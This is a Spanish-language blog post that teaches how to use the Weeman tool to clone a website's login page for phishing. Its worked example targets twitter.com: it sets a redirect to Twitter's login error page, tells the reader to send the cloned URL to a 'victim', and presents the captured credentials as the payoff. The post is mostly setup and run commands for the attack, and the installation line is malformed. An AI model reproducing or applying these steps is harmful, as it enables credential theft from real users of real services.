miércoles, 7 de diciembre de 2016

Clonando plataformas web con Weeman

Saludos mis queridos fieles lectores en esta oportunidad les traigo un automatizador  para clonar plataformas web de manera rápida y sencilla.

¿Que es Weeman?

Es una herramienta desarrollada en Python para clonar cualquier sitio web y capturar los datos almacenados.
(Soporta HTTP & HTTPS)

Instalación:

root@kali:/# https://github.com/evait-security/weeman.git
root@kali:/# cd weeman

Requisitos: bs4

root@kali:/# pip install bs4

Ejecutando:

root@kali:/# cd weeman

weeman > set url https://twitter.com                                     (Sitio web que deseamos clonar)
weeman > set action_url https://twitter.com/login/error       (Redirección de la pagina)
weeman > set port 80                                                            (Puerto por defecto)
weeman > run

Si observamos nos sale que el puerto esta en USO, porque tengo el apache activado. ( de manera automatizada te establece el puerto de escucha)

weeman > set port 8080
weeman > run

Enviamos nuestra URLa nuestra victima ( claro con nuestra IP Lan o WAN )

Cuando nuestra victima ingrese sus credenciales correspondientes de manera automática lo redireccionara:

¿Muy creíble verdad?, ahora en segundo plano ustedes tendrán sus credenciales:





0 comentarios:

Publicar un comentario

Datos del Autor

Estudiante de Ingeniería de computación y sistemas en Perú.
actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.

"Me considero un novato en busca de conocimiento"


Entradas Populares